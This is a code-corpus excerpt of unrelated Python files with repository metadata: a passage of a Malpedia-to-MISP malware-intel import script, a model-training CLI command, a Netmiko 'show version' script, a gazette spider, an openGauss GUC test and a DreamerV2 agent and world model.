event.add_attribute(attributeType, myVersion, comment=attributeComment, category=attributeCategory, to_ids=attributeToIDS, disable_correlation=attribDisableCorrelation)
# SET DATE ADDED
date_added = iPC_META["date_added"]
if valid_date(date_added):
event.date = date_added
else:
event.date = datetime.date.today()
# GET TAGS
myTags = db.get_set_all_tags(myUUID)
event.tags = myTags
if gv._DEBUG:
print("f(x) createMalware: TAGS")
print(*myTags, sep = "\n")
# MARK SOURCE OF INFORMATION
attributeType = "link"
attributeCategory = "Internal reference"
attributeComment = "DATA FROM MALPEDIA."
if gv._DEBUG:
print("f(x) createMalware: ATTRIBUTION LINK: \nCATEGORY: {} \nTYPE: {} \nVALUE: {} \nTO_IDS: {} \nCOMMENT: {} \nDISABLE CORRELATION: {} \
".format(attributeCategory, attributeType, gv._MALPEDIA_URL, attributeToIDS, attributeComment, attribDisableCorrelation))
event.add_attribute(attributeType, gv._MALPEDIA_URL, comment=attributeComment, category=attributeCategory, to_ids=attributeToIDS, disable_correlation=attribDisableCorrelation)
# ADD ATTACHMENT
myPath = iPC_META["path"]
fo = None
peo = None
seos = None
# CREATE ATTACHMENT BUT DON'T UPLOAD IT AGAIN IF THIS IS JUST AN UPDATE
if iUpdate == False:
for f in glob.glob(iPC_META["path"]):
try:
fo , peo, seos = make_binary_objects(f)
except Exception as e:
continue
gv._THREAD_LIST.append(uexecutor.submit(pushToMISPWithAttachment, event, myPath, iUpdate, gv._MISP_URL, gv._MISP_KEY, gv._MISP_VERIFYCERT, gv._DEBUG, fo , peo, seos))
# pushToMISPWithAttachment(event, myPath, iUpdate, gv._MISP_URL, gv._MISP_KEY, gv._MISP_VERIFYCERT, gv._DEBUG, fo , peo, seos)
except Exception as e:
exc_type, _, exc_tb = sys.exc_info()
fname = os.path.split(exc_tb.tb_frame.f_code.co_filename)[1]
print("f(x) createMalware: {}: {}: {}".format(exc_type, fname, exc_tb.tb_lineno))
sys.exit(e)
def uuidSearch(iUUID):
try:
retVal = 0
mispDB = pm.ExpandedPyMISP(url=gv._MISP_URL, key=gv._MISP_KEY, ssl=gv._MISP_VERIFYCERT, debug=gv._DEBUG)
kwargs = {"uuid" : iUUID}
result = mispDB.search(controller='events', return_format='json', limit=1, **kwargs)
retVal = int(len(result))
return retVal
except Exception as e:
print (e)
def deleteEvent(iUUID="", iEventID=""):
try:
mispDB = pm.ExpandedPyMISP(url=gv._MISP_URL, key=gv._MISP_KEY, ssl=gv._MISP_VERIFYCERT, debug=gv._DEBUG)
event_id = ""
if iUUID != "":
kwargs = {"uuid" : iUUID}
result = mispDB.search(controller='events', return_format='json', limit=1, **kwargs)
for val in result:
event_id = val["Event"]["id"]
elif iEventID != "":
event_id = iEventID
if event_id != "":
if gv._DEBUG:
print("f(x) deleteEvent: ATTEMPTING TO DELETE EVENT [IF EXISTS]: {}".format(event_id))
mispDB.delete_event(event_id)
else:
print("f(x) deleteEvent: EMPTY EVENT_ID FOUND. NO DELETION MADE\niUUID: {}\niEventID: {}\nRETURNED EVENT ID [IF APPLICABLE]: {}".format( iUUID, iEventID, event_id))
except Exception as e:
print (e)
def getOrgEvents(iOrgID):
try:
misp = pm.ExpandedPyMISP(gv._MISP_URL, gv._MISP_KEY, gv._MISP_VERIFYCERT)
kwargs = {"org_id" : iOrgID}
# result = misp.search('events', published=0, **kwargs)
result = misp.search('events', published=1, **kwargs)
return result
except Exception as e:
print (e)
if __name__ == '__main__':
print("INIT")
| 37.694203
| 186
| 0.568995
|
794d98c3e55f0cef925c894773d4728356eb7d8e
| 1,158
|
py
|
Python
|
discernwise/commands/train.py
|
eeriksp/discernwise
|
26cdb86c0f069f1dd26b9b0c1338c7343208eeea
|
[
"MIT"
] | 3
|
2021-04-15T13:42:40.000Z
|
2021-04-16T15:44:59.000Z
|
discernwise/commands/train.py
|
eeriksp/discernwise
|
26cdb86c0f069f1dd26b9b0c1338c7343208eeea
|
[
"MIT"
] | null | null | null |
discernwise/commands/train.py
|
eeriksp/discernwise
|
26cdb86c0f069f1dd26b9b0c1338c7343208eeea
|
[
"MIT"
] | null | null | null |
from argparse import ArgumentParser
from commands.base import BaseCommand
from presentation.train import display_training_results
from services.train import TrainingConfig, train
class TrainCommand(BaseCommand):
"""
Use the given dataset to train a new model,
save the model to the given path
and display a GUI window with training statistics.
"""
name = 'train'
help = 'train a new model with the given dataset'
@staticmethod
def add_arguments(p: ArgumentParser) -> None:
p.add_argument('model_path', help='path where to save the new trained model')
p.add_argument('dataset_path', help='path to the dataset directory containing a subdirectory for each category')
p.add_argument('--epochs', type=int, default=2, dest="epochs", help='The number of epochs used for training')
@staticmethod
def build_config(args) -> TrainingConfig:
return TrainingConfig(model_path_str=args.model_path, data_dir_str=args.dataset_path, epochs=args.epochs)
@staticmethod
def handle(config: TrainingConfig) -> None:
results = train(config)
display_training_results(results)
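# Illustrative invocation (added; paths are hypothetical and the exact entry
# point depends on how the project dispatches its BaseCommand subclasses):
#
#   discernwise train ./model.h5 ./dataset --epochs 5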
| 37.354839
| 120
| 0.728843
|
794d994e6a654793b9be5dad209aa40c437a4b42
| 1,555
|
py
|
Python
|
wk8_hw/ex5_netmiko_sh_ver.py
|
philuu12/PYTHON_4_NTWK_ENGRS
|
ac0126ed687a5201031a6295d0094a536547cb92
|
[
"Apache-2.0"
] | 1
|
2016-03-01T14:39:17.000Z
|
2016-03-01T14:39:17.000Z
|
wk8_hw/ex5_netmiko_sh_ver.py
|
philuu12/PYTHON_4_NTWK_ENGRS
|
ac0126ed687a5201031a6295d0094a536547cb92
|
[
"Apache-2.0"
] | null | null | null |
wk8_hw/ex5_netmiko_sh_ver.py
|
philuu12/PYTHON_4_NTWK_ENGRS
|
ac0126ed687a5201031a6295d0094a536547cb92
|
[
"Apache-2.0"
] | null | null | null |
#!/usr/bin/env python
"""
5. Use Netmiko to connect to each of the devices in the database.
Execute 'show version' on each device. Calculate the amount of time required to do this.
"""
from __future__ import print_function
from netmiko import ConnectHandler
from datetime import datetime
from net_system.models import NetworkDevice, Credentials
import django
import ex1_link_obj_2_credentials
def main():
django.setup()
# Load device info and credentials into database
ex1_link_obj_2_credentials.link_device_to_credentials()
devices = NetworkDevice.objects.all()
for a_device in devices:
if a_device.device_name and a_device.credentials:
start_time = datetime.now()
creds = a_device.credentials
username = creds.username
password = creds.password
remote_conn = ConnectHandler(device_type=a_device.device_type,
ip=a_device.ip_address,
username=username,
password=password,
port=a_device.port,
secret='')
            # Print out 'show version' output
            print()
            print('#' * 80)
            print("'show version' output for device: %s" % a_device.device_name)
            print('#' * 80)
            print(remote_conn.send_command("show version"))
            # Print out elapsed time
            print('#' * 80)
            print("Elapsed time: " + str(datetime.now() - start_time))
            print('#' * 80)
if __name__ == "__main__":
main()
| 31.1
| 88
| 0.601286
|
794d99f9b2f1554757c8df78a1c60d89de6cd5ac
| 193
|
py
|
Python
|
data_collection/gazette/spiders/sc_paraiso.py
|
kaiocp/querido-diario
|
86004049c6eee305e13066cf3607d30849bb099a
|
[
"MIT"
] | 454
|
2018-04-07T03:32:57.000Z
|
2020-08-17T19:56:22.000Z
|
data_collection/gazette/spiders/sc_paraiso.py
|
kaiocp/querido-diario
|
86004049c6eee305e13066cf3607d30849bb099a
|
[
"MIT"
] | 254
|
2020-08-18T14:09:43.000Z
|
2022-03-28T11:30:51.000Z
|
data_collection/gazette/spiders/sc_paraiso.py
|
kaiocp/querido-diario
|
86004049c6eee305e13066cf3607d30849bb099a
|
[
"MIT"
] | 183
|
2018-04-11T15:09:37.000Z
|
2020-08-15T18:55:11.000Z
|
from gazette.spiders.base.fecam import FecamGazetteSpider
class ScParaisoSpider(FecamGazetteSpider):
name = "sc_paraiso"
FECAM_QUERY = "cod_entidade:190"
TERRITORY_ID = "4212239"
| 24.125
| 57
| 0.766839
|
794d9b0b5c574f8e6daac8f3f5543d271e6019e6
| 3,243
|
py
|
Python
|
openGaussBase/testcase/GUC/CONNECTIONAUTHENTICATION/Opengauss_Function_Guc_Connectionauthentication_Case0130.py
|
opengauss-mirror/Yat
|
aef107a8304b94e5d99b4f1f36eb46755eb8919e
|
[
"MulanPSL-1.0"
] | null | null | null |
openGaussBase/testcase/GUC/CONNECTIONAUTHENTICATION/Opengauss_Function_Guc_Connectionauthentication_Case0130.py
|
opengauss-mirror/Yat
|
aef107a8304b94e5d99b4f1f36eb46755eb8919e
|
[
"MulanPSL-1.0"
] | null | null | null |
openGaussBase/testcase/GUC/CONNECTIONAUTHENTICATION/Opengauss_Function_Guc_Connectionauthentication_Case0130.py
|
opengauss-mirror/Yat
|
aef107a8304b94e5d99b4f1f36eb46755eb8919e
|
[
"MulanPSL-1.0"
] | null | null | null |
"""
Copyright (c) 2022 Huawei Technologies Co.,Ltd.
openGauss is licensed under Mulan PSL v2.
You can use this software according to the terms and conditions of the Mulan PSL v2.
You may obtain a copy of Mulan PSL v2 at:
http://license.coscl.org.cn/MulanPSL2
THIS SOFTWARE IS PROVIDED ON AN "AS IS" BASIS, WITHOUT WARRANTIES OF ANY KIND,
EITHER EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO NON-INFRINGEMENT,
MERCHANTABILITY OR FIT FOR A PARTICULAR PURPOSE.
See the Mulan PSL v2 for more details.
"""
"""
Case Type : GUC
Case Name : 使用ALTER SYSTEM SET修改数据库参数authentication_timeout
Description :
1、查看authentication_timeout默认值;
source /opt/opengauss810/env
gs_guc check -D {cluster/dn1} -c authentication_timeout
2、使用ALTER SYSTM SET修改数据库参数authentication_timeout;
ALTER SYSTEM set authentication_timeout to '10min';
3、重启使其生效,校验预期结果;
Expect :
1、显示默认值;
2、参数修改成功;
3、重启成功,参数修改成功。
History :
"""
import unittest
from testcase.utils.CommonSH import CommonSH
from testcase.utils.Constant import Constant
from testcase.utils.Logger import Logger
from yat.test import Node
from yat.test import macro
COMMONSH = CommonSH('PrimaryDbUser')
class GucTest(unittest.TestCase):
def setUp(self):
self.log = Logger()
self.constant = Constant()
        self.log.info('==Guc_Connectionauthentication_Case0130 start==')
self.db_user_node = Node(node='PrimaryDbUser')
status = COMMONSH.get_db_cluster_status()
self.assertTrue("Normal" in status or "Degraded" in status)
def test_startdb(self):
self.log.info("查询该参数默认值")
sql_cmd = COMMONSH.execut_db_sql('''show authentication_timeout;''')
self.log.info(sql_cmd)
self.assertEqual("1min", sql_cmd.split("\n")[-2].strip())
self.log.info("设置authentication_timeout")
sql_cmd = COMMONSH.execut_db_sql(
f'''ALTER SYSTEM set authentication_timeout to '10min';''')
self.log.info(sql_cmd)
self.assertIn("ALTER SYSTEM SET", sql_cmd)
self.log.info("重启使其生效,并校验预期结果")
COMMONSH.restart_db_cluster()
checksql = f"source {macro.DB_ENV_PATH};gsql " \
f"-d {self.db_user_node.db_name} " \
f"-p {self.db_user_node.db_port} " \
f"-c 'show authentication_timeout';"
self.log.info(checksql)
checkresult = self.db_user_node.sh(checksql).result()
self.assertIn('10min', checkresult)
def tearDown(self):
self.log.info("恢复默认值")
result = COMMONSH.execute_gsguc('set', self.constant.GSGUC_SUCCESS_MSG,
f"authentication_timeout=1min")
self.assertTrue(result)
COMMONSH.restart_db_cluster()
status = COMMONSH.get_db_cluster_status()
self.assertTrue("Normal" in status or "Degraded" in status)
self.log.info("查询该参数默认值")
sql_cmd = COMMONSH.execut_db_sql('''show authentication_timeout;''')
self.log.info(sql_cmd)
self.assertEqual("1min", sql_cmd.split("\n")[-2].strip())
        self.log.info('==Guc_Connectionauthentication_Case0130 end==')
| 37.275862
| 84
| 0.655257
|
794d9ba91f84fed070a586dbccd061eb47efdcab
| 37,290
|
py
|
Python
|
dreamerv2/agent.py
|
footoredo/dreamerv2
|
493e1c0b92cf667a4b4fdcaf8f805273beeb165f
|
[
"MIT"
] | null | null | null |
dreamerv2/agent.py
|
footoredo/dreamerv2
|
493e1c0b92cf667a4b4fdcaf8f805273beeb165f
|
[
"MIT"
] | null | null | null |
dreamerv2/agent.py
|
footoredo/dreamerv2
|
493e1c0b92cf667a4b4fdcaf8f805273beeb165f
|
[
"MIT"
] | null | null | null |
from os.path import exists
import re
import numpy as np
import tensorflow as tf
from tensorflow.keras import mixed_precision as prec
import common
import expl
class Agent(common.Module):
def __init__(self, config, logger, step, shapes):
self.config = config
self._logger = logger
self._num_act = shapes['action'][-1]
self._counter = step
self.step = tf.Variable(int(self._counter), tf.int64)
self.wm = WorldModel(self.step, shapes, self._num_act, config)
# print("wm:", self.wm.variables)
self._task_behavior = ActorCritic(config, self.step, self._num_act)
if config.expl_behavior == 'greedy':
self._expl_behavior = self._task_behavior
else:
reward = lambda seq: self.wm.heads['reward'](seq['feat']).mode()
inputs = config, self.wm, self._num_act, self.step, reward
self._expl_behavior = getattr(expl, config.expl_behavior)(*inputs)
def save_transformer(self, save_dir):
save_dir.mkdir(exist_ok=True)
self.wm.save_transformer(save_dir)
def load_transformer(self, load_dir):
self.wm.load_transformer(load_dir)
@tf.function
def policy(self, obs, state=None, mode='train'):
obs = tf.nest.map_structure(tf.tensor, obs)
tf.py_function(lambda: self.step.assign(
int(self._counter), read_value=False), [], [])
processed_obs = self.wm.preprocess(obs)
if state is None:
latent = self.wm.rssm.initial(len(obs['reward']))
prev_image = tf.zeros_like(processed_obs['image'])
action = tf.zeros((len(obs['reward']), self._num_act))
state = latent, prev_image, action
latent, prev_image, action = state
embed = self.wm.encoder(processed_obs)
t_embed = self.wm.rssm.transformer_encode(processed_obs, tf.zeros_like(embed))
sample = (mode == 'train') or not self.config.eval_state_mean
latent, _ = self.wm.rssm.obs_step(
latent, prev_image, action, processed_obs['image'], embed, t_embed, obs['is_first'], sample)
feat = self.wm.rssm.get_feat(latent)
if mode == 'eval':
actor = self._task_behavior.actor(feat)
action = actor.mode()
noise = self.config.eval_noise
elif mode == 'explore':
actor = self._expl_behavior.actor(feat)
action = actor.sample()
noise = self.config.expl_noise
elif mode == 'train':
actor = self._task_behavior.actor(feat)
action = actor.sample()
noise = self.config.expl_noise
elif mode == 'random':
actor = self._task_behavior.actor(feat)
action = actor.sample()
noise = 1.0
action = common.action_noise(action, noise, self.config.discrete)
# mat = np.eye(17)
# mat[7, 7] = 0
# mat[7, 0] = 1 # replace place_stone to
# mat = tf.constant(mat, dtype=action.dtype)
# action = tf.matmul(action, mat)
outputs = {'action': action}
state = (latent, processed_obs['image'], action)
return outputs, state
@tf.function(experimental_compile=False)
def train(self, data, state=None):
print("in agent train()", flush=True)
metrics = {}
# for k, v in data.items():
# print(k, type(v))
state, outputs, mets, model_loss, prior = self.wm.train(data, state)
metrics.update(mets)
start = outputs['post']
if self.config.make_graph:
return model_loss
# print("self.wm.train states:", flush=True)
# for k, v in start.items():
# p = 1
# for d in v.shape:
# p *= d
# print(k, v.shape, p)
# for k, v in start.items():
# print(k, v.device)
# return model_loss, prior
def reward_fn(seq):
if self.config.use_transformer_reward:
print("seq['feat'].shape", seq['feat'].shape, flush=True) # [length, batch, ...]
dists = self.wm.heads['decoder'](seq['feat'])
imagined_obs = dict()
for key, dist in dists.items():
imagined_obs[key] = dist.mode()
if self.wm.rssm.use_independent_transformer_encoder:
_embed = self.wm.rssm.transformer_encode(imagined_obs)
else:
_embed = self.wm.encoder(imagined_obs)
swap = lambda x: tf.transpose(x, [1, 0] + list(range(2, len(x.shape))))
out = self.wm.rssm.calc_independent_transformer_hidden(swap(_embed), swap(seq['action']),
swap(tf.zeros_like(seq['action'])[:, :, 0]), training=True, return_weight=False)
r = swap(self.wm.heads['transformer_reward'](out).mode())
else:
r = self.wm.heads['reward'](seq['feat']).mode()
if self.config.use_int_reward:
for source in self.config.int_reward_sources:
coef = self.config.int_reward_coef.get(source, 1.0)
print(f'int reward source: {source} coef: {coef}')
r += coef * self.wm.heads[f'int_reward_{source}'](seq['feat']).mode()
return r
if not self.config.no_behavior_training:
metrics.update(self._task_behavior.train(
self.wm, start, data['is_terminal'], reward_fn))
if self.config.expl_behavior != 'greedy':
mets = self._expl_behavior.train(start, outputs, data)[-1]
metrics.update({'expl_' + key: value for key, value in mets.items()})
print("out agent train()", flush=True)
return state, metrics
@tf.function(experimental_compile=False)
def report(self, data, return_data=False):
print(f"in report(), return_data={return_data}")
report = {}
data = self.wm.preprocess(data)
for k, v in data.items():
print(k, v.shape, flush=True)
rtn = None
for key in data:
if re.match(self.config.decoder.cnn_keys, key):
name = key.replace('/', '_')
pred_dict = self.wm.video_pred(data, key, self._task_behavior if not self.config.no_behavior_training else None)
report[f'openl_{name}'] = pred_dict['images']
if return_data:
# print("save pred data")
rtn = pred_dict
if return_data:
return report, rtn
else:
return report
class WorldModel(common.Module):
def __init__(self, step, shapes, num_actions, config):
self.step = step
self.config = config
self.encoder = common.Encoder(**config.encoder)
self.rssm = common.EnsembleRSSM(config, encoder=None, num_actions=num_actions, **config.rssm)
self.heads = {}
def add_head(_name, _module, *args, **kwargs):
if config.use_head_mask:
self.heads[_name] = common.MaskLayer(lambda: _module(*args, **kwargs), self.rssm.get_mask(_name), gradient_mask=config.head_mask.gradient)
else:
self.heads[_name] = _module(*args, **kwargs)
add_head('decoder', common.Decoder, shapes, **config.decoder)
# self.heads['decoder'] = common.Decoder(shapes, **config.decoder)
add_head('reward', common.MLP, [], **config.reward_head)
# self.heads['reward'] = common.MLP([], **config.reward_head)
self._use_transformer_reward_head = config.rssm.use_transformer_reward_head and config.rssm.use_transformer
if self._use_transformer_reward_head:
add_head('transformer_reward', common.MLP, [], **config.reward_head)
# self.heads['transformer_reward'] = common.MLP([], **config.reward_head)
self._myopic_prediction = config.myopic_prediction
if self._myopic_prediction:
add_head('myopic_reward', common.MLP, [], **config.reward_head)
self._use_int_reward = config.use_int_reward
if self._use_int_reward:
print("use int reward!", flush=True)
self._int_reward_sources = config.int_reward_sources
for source in self._int_reward_sources:
add_head(f'int_reward_{source}', common.MLP, [], **config.reward_head)
if source == 'attention':
self.rssm.set_importance_head(self.heads['int_reward_attention'])
# self.heads['int_reward'] = common.MLP([], **config.reward_head)
# print("wm.reward:", self.heads['reward'].variables)
# self._use_attention_int_reward = config.use_attention_int_reward
if config.pred_discount:
add_head('discount', common.MLP, [], **config.discount_head)
# self.heads['discount'] = common.MLP([], **config.discount_head)
for name in config.grad_heads:
assert name in self.heads, name
self.model_opt = common.Optimizer('model', **config.model_opt)
self._bootstrap_frames = config.bootstrap_frames
self._video_pred_batches = config.video_pred_batches
# self._running_stats = {}
def save_transformer(self, save_dir):
self.rssm.save_transformer(save_dir)
def load_transformer(self, load_dir):
self.rssm.load_transformer(load_dir)
def train(self, data, state=None):
print("in wm train()", flush=True)
with tf.GradientTape() as model_tape:
model_loss, state, outputs, metrics, prior = self.loss(data, state)
print("model_loss", model_loss, flush=True)
print(metrics.keys(), flush=True)
for k, v in metrics.items():
print(k, v, flush=True)
# print("1", flush=True)
modules = [self.encoder, self.rssm, *self.heads.values()]
# print("2", flush=True)
metrics.update(self.model_opt(model_tape, model_loss, modules))
print("out wm train()", flush=True)
return state, outputs, metrics, model_loss, prior
def calc_t_importance(self, t_weight, truth_reward, pred_reward, t_pred_reward, myopic_pred_reward, st_weight, source=None, reduction=None):
print("in calc_t_importance")
print("t_weight.shape", t_weight.shape)
print("truth_reward.shape", truth_reward.shape)
print("pred_reward.shape", pred_reward.shape)
print("t_pred_reward.shape", t_pred_reward.shape)
if source is None:
source = self.config.future_importance_source
if reduction is None:
reduction = self.config.future_importance_reduction
if source == 'state':
t_weight = tf.identity(st_weight) # [batch, length, num_heads, length], logits
else:
t_weight = tf.identity(t_weight)
t_weight = tf.nn.softmax(t_weight, axis=-1) # [batch, length, num_heads, length], weight
if reduction == 'mean':
t_weight = tf.reduce_mean(t_weight, -2) # [batch, length, length]
elif reduction == 'max':
t_weight = tf.reduce_max(t_weight, -2) # [batch, length, length]
else:
raise NotImplementedError
identity = tf.eye(t_weight.shape[1]) # [length, length]
identity = tf.expand_dims(identity, 0) # [1, length, length]
t_weight = tf.multiply(1 - identity, t_weight) # only cares attention in the past steps
if source == 'reward':
item = truth_reward
elif source == 'abs_reward':
item = tf.abs(truth_reward)
elif source == 'reward_diff':
item = tf.abs(pred_reward - t_pred_reward)
elif source == 'reward_diff_myopic':
item = tf.abs(myopic_pred_reward - t_pred_reward)
elif source == 'state':
item = tf.ones_like(truth_reward)
else:
raise NotImplementedError
t_importance = tf.multiply(tf.expand_dims(item, -1), t_weight) # [batch, length, length] -> pairwise importance
return t_importance
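    # Worked toy example for calc_t_importance (numbers hypothetical):
    #   softmaxed attention row of step t over all steps: [0.7 (self), 0.2, 0.1]
    #   multiplying by (1 - identity) zeroes the diagonal: [0.0, 0.2, 0.1]
    #   with item (e.g. |reward| at t) = 2.0, the pairwise importance row becomes
    #   [0.0, 0.4, 0.2]: how much each past step is credited for step t.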
def loss(self, data, state=None):
# print("in loss()", flush=True)
data = self.preprocess(data)
# print("1", flush=True)
embed = self.encoder(data)
transformer_embed = self.rssm.transformer_encode(data, tf.zeros_like(embed))
# print("2", flush=True)
post, prior, state_transformer_stats = self.rssm.observe(
embed, transformer_embed, data['image'], data['action'], data['is_first'], training=True, state=state, transformer_weight=True)
# print("3", flush=True)
kl_loss, kl_value = self.rssm.kl_loss(post, prior, **self.config.kl)
assert len(kl_loss.shape) == 0
likes = {}
losses = {'kl': kl_loss}
if state_transformer_stats is not None:
state_transformer_kl_loss, state_transformer_kl_value = self.rssm.kl_loss(post, state_transformer_stats, forward=False, balance=1.0, free=0.0, free_avg=True)
losses["state_transformer_kl"] = state_transformer_kl_loss
feat = self.rssm.get_feat(post)
# print(feat.shape)
myopic_pred_reward = None
for name, head in self.heads.items():
if name.startswith("int_reward"):
continue
if name == "transformer_reward":
# print("transformer_reward in loss", post['t_transformer'].shape, post['t_transformer'])
dist = head(post['t_transformer'])
t_pred_reward = tf.stop_gradient(dist.mode())
like = tf.cast(dist.log_prob(data["reward"]), tf.float32)
losses["transformer_reward"] = -like.mean()
elif name == 'myopic_reward':
dist = head(post['myopic_out'])
myopic_pred_reward = tf.stop_gradient(dist.mode())
like = tf.cast(dist.log_prob(data["reward"]), tf.float32)
losses["myopic_reward"] = -like.mean()
else:
grad_head = (name in self.config.grad_heads)
inp = feat if grad_head else tf.stop_gradient(feat)
out = head(inp)
dists = out if isinstance(out, dict) else {name: out}
for key, dist in dists.items():
if key == 'reward':
pred_reward = tf.stop_gradient(dist.mode())
# print(key, data[key].shape, dist.mean().shape)
like = tf.cast(dist.log_prob(data[key]), tf.float32)
# if not key in self._running_stats:
# self._running_stats[key] = common.RunningStats(like.shape)
# self._running_stats[key].push(-like)
likes[key] = like
losses[key] = -like.mean()
metrics = {}
if 't_weight_0' in post:
# t_weight = tf.identity(post[f't_weight_{self.rssm.transformer_num_layers - 1}']) # [batch, length, num_heads, length], logits
# t_weight = tf.nn.softmax(t_weight, axis=-1) # [batch, length, num_heads, length], weight
# t_weight = tf.reduce_mean(t_weight, -2) # [batch, length, length]
# identity = tf.eye(t_weight.shape[1]) # [length, length]
# identity = tf.expand_dims(identity, 0) # [1, length, length]
# t_weight = tf.multiply(1 - identity, t_weight) # only cares attention in the past steps
# if self.config.future_importance_source == 'reward':
# source = data['reward']
# elif self.config.future_importance_source == 'abs_reward':
# source = tf.abs(data['reward'])
# elif self.config.future_importance_source == 'reward_diff':
# source = tf.abs(pred_reward - t_pred_reward)
# else:
# raise NotImplementedError
# t_importance = tf.multiply(tf.expand_dims(source, -1), t_weight) # [batch, length, length] -> pairwise importance
rt_weights = post[f't_weight_{self.rssm._transformer.num_layers - 1}']
try:
st_weights = post[f't_state_weight_{self.rssm._transformer.num_layers - 1}']
except KeyError:
st_weights = None
t_importance = self.calc_t_importance(rt_weights, data['reward'], pred_reward, t_pred_reward, myopic_pred_reward, st_weights)
if self._use_int_reward:
def _add_int_reward_loss(_source, _int_reward):
key = f'int_reward_{_source}'
inp = tf.stop_gradient(feat)
dist = self.heads[key](inp)
like = tf.cast(dist.log_prob(_int_reward), tf.float32)
losses[key] = -like.mean()
metrics[f'{key}_max'] = _int_reward.max()
metrics[f'{key}_min'] = _int_reward.min()
metrics[f'{key}_mean'] = _int_reward.mean()
metrics[f'{key}_std'] = _int_reward.std()
if 'expl' in self._int_reward_sources:
model_like = 0
print("in calc int from expl")
for k, v in likes.items():
_v = (v.mean() - v) / (v.std() + 1e-8)
mask = tf.cast(_v > 1, tf.float32)
_v = mask * _v # only keep significant reward (> 1 std)
print(k, _v.shape)
metrics[f'{k}_like_max'] = _v.max()
metrics[f'{k}_like_min'] = _v.min()
metrics[f'{k}_like_std'] = _v.std()
model_like += self.config.int_reward_scales.get(k, 0.0) * _v
_add_int_reward_loss('expl', model_like)
if 'attention' in self._int_reward_sources:
t_int_reward = tf.reduce_sum(t_importance, -2) # [batch, length]
_add_int_reward_loss('attention', tf.stop_gradient(t_int_reward))
# if self._use_int_reward and 'expl' in self._int_reward_sources:
# model_like = 0
# print("in calc int from expl")
# for k, v in likes.items():
# _v = (v.mean() - v) / (v.std() + 1e-8)
# mask = tf.cast(_v > 1, tf.float32)
# _v = mask * _v # only keep significant reward (> 1 std)
# print(k, _v.shape)
# metrics[f'{k}_like_max'] = _v.max()
# metrics[f'{k}_like_min'] = _v.min()
# metrics[f'{k}_like_std'] = _v.std()
# model_like += self.config.int_reward_scales.get(k, 0.0) * _v
# int_reward = model_like
# # data["int_reward"] = int_reward
# inp = tf.stop_gradient(feat)
# # inp = feat
# dist = self.heads["int_reward_expl"](inp)
# like = tf.cast(dist.log_prob(int_reward), tf.float32)
# # print("model_like", model_like.shape, inp.shape, like.shape, flush=True)
# likes["int_reward_expl"] = like
# losses["int_reward_expl"] = -like.mean()
# metrics['int_reward_expl_max'] = int_reward.max()
# metrics['int_reward_expl_min'] = int_reward.min()
# metrics['int_reward_expl_mean'] = int_reward.mean()
# metrics['int_reward_expl_std'] = int_reward.std()
# if self.rssm.use_transformer:
# losses['transformer_weight_norm'] = 0
# for i in range(self.rssm.transformer_num_layers):
# losses['transformer_weight_norm'] += post[f't_weight_norm_{i}'].mean()
model_loss = 0
# if self._use_int_reward:
# model_loss += losses["int_reward"]
# print("losses:", flush=True)
# model_loss = tf.zeros([], dtype=tf.float32)
for k, v in losses.items():
# print(k, v.shape, v, self.config.loss_scales.get(k, 1.0), flush=True)
model_loss += self.config.loss_scales.get(k, 1.0) * v
# model_loss = sum(
# self.config.loss_scales.get(k, 1.0) * v for k, v in losses.items())
outs = dict(
embed=embed, feat=feat, post=post,
prior=prior, likes=likes, kl=kl_value)
metrics.update({f'{name}_loss': value for name, value in losses.items()})
metrics['model_kl'] = kl_value.mean()
if state_transformer_stats is not None:
metrics['state_transformer_kl_value'] = state_transformer_kl_value.mean()
metrics['prior_ent'] = self.rssm.get_dist(prior).entropy().mean()
metrics['post_ent'] = self.rssm.get_dist(post).entropy().mean()
# if self.rssm.use_transformer:
# for i in range(self.rssm.transformer_num_layers):
# metrics[f'transformer_weight_norm_{i}'] = tf.sqrt(post[f't_weight_norm_{i}']).mean()
# def get_last(k, v):
# if k.startswith('t_'):
# return v[-1]
# else:
# return v[:, -1]
last_state = {k: v[:, -1] for k, v in post.items()}
# print("out loss()", flush=True)
return model_loss, last_state, outs, metrics, prior
def imagine(self, policy, start, is_terminal, horizon):
flatten = lambda x: x.reshape([-1] + list(x.shape[2:]))
# for k, v in start.items():
# print(k, type(v))
# if type(v) == list:
# print(len(v), v[0].shape)
# else:
# print(v.shape)
# print("in imagine")
# for k, v in start.items():
# print(k, v.device)
# def _flatten(k, v):
# if k.startswith('t_'):
start = {k: flatten(v) for k, v in start.items()}
start['feat'] = self.rssm.get_feat(start)
start['action'] = tf.zeros_like(policy(start['feat']).mode())
# print("in imagine:", start.keys()) # dict_keys(['logit', 'stoch', 'deter', 'feat', 'action'])
# print("in imagine:", start.items())
seq = {k: [v[:]] for k, v in start.items() if not k.startswith('t_')}
t_states = {k: v[:] for k, v in start.items() if k.startswith('t_')}
for h in range(horizon):
action = policy(tf.stop_gradient(seq['feat'][-1])).sample()
states = {k: v[-1][:] for k, v in seq.items()}
states.update({k: v[:] for k, v in t_states.items()})
state = self.rssm.img_step(states, action[:], training=False)
feat = self.rssm.get_feat(state)
print("horizon", h)
for key, value in {**state, 'action': action, 'feat': feat}.items():
# print()
if key.startswith('t_'):
t_states[key] = value
else:
seq[key].append(value)
print(key, value.shape)
seq = {k: tf.stack(v, 0) for k, v in seq.items()}
if 'discount' in self.heads:
disc = self.heads['discount'](seq['feat']).mean()
if is_terminal is not None:
# Override discount prediction for the first step with the true
# discount factor from the replay buffer.
true_first = 1.0 - flatten(is_terminal).astype(disc.dtype)
true_first *= self.config.discount
disc = tf.concat([true_first[:][None], disc[1:]], 0)
else:
disc = self.config.discount * tf.ones(seq['feat'].shape[:-1])
seq['discount'] = disc
# Shift discount factors because they imply whether the following state
# will be valid, not whether the current state is valid.
seq['weight'] = tf.math.cumprod(
tf.concat([tf.ones_like(disc[:1]), disc[:-1]], 0), 0)
return seq
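    # Sketch of the discount shift above: for disc = [d0, d1, d2] the weights are
    # cumprod([1, d0, d1]) = [1, d0, d0*d1], i.e. each state is weighted by the
    # probability that all *preceding* states were non-terminal, not by its own flag.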
@tf.function(experimental_compile=False)
def preprocess(self, obs):
dtype = prec.global_policy().compute_dtype
obs = obs.copy()
for key, value in obs.items():
if key.startswith('log_'):
continue
if value.dtype == tf.int32:
value = value.astype(dtype)
if value.dtype == tf.uint8:
value = value.astype(dtype) / 255.0 - 0.5
obs[key] = value
obs['reward'] = {
'identity': tf.identity,
'sign': tf.sign,
'tanh': tf.tanh,
}[self.config.clip_rewards](obs['reward'])
obs['discount'] = 1.0 - obs['is_terminal'].astype(dtype)
obs['discount'] *= self.config.discount
return obs
